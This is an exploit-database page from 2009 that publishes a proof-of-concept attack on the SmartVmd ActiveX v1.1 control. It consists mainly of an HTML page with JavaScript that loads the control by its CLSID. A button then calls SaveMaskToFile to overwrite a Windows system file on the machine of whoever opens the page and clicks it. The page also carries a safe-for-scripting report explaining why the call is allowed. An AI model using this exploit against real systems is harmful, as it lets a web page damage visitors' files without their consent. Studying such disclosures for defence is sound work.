[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : SmartVmd ActiveX v 1.1 Remote File Overwrite Exploit
# Published : 2009-01-19
# Author : Houssamix
# Previous Title : AXIS 70U Network Document Server Privilege Escalation/XSS
# Next Title : SmartVmd ActiveX v 1.1 Remote File Deletion Exploit


<HTML>
<BODY>

<b>   
	Author : Houssamix    <br/>  <br/>  <br/>

   	SmartVmd ActiveX v 1.1 remote File Overwrite Exploit   <br/>

	download : http://www.smartvmd.com/setup/SetupActiveXVmd.msi  <br/>
<b/>


<object id=hsmx classid="clsid:{E3462D53-47A6-11D8-8EF6-DAE89272743C}"></object>

<SCRIPT>
/*

Report for Clsid: {E3462D53-47A6-11D8-8EF6-DAE89272743C}
RegKey Safe for Script: Faux
RegKey Safe for Init: Faux
Implements IObjectSafety: Vrai
IDisp Safe:  Safe for untrusted: caller  

*/
function hehe()
 {
     File = "c:\windows\system_.ini"
   hsmx.SaveMaskToFile(File)
 }

</SCRIPT>
<input language=JavaScript onclick=hehe() type=button value="execute exploit"><br>
</body>
</HTML>

# www.Syue.com [2009-01-19]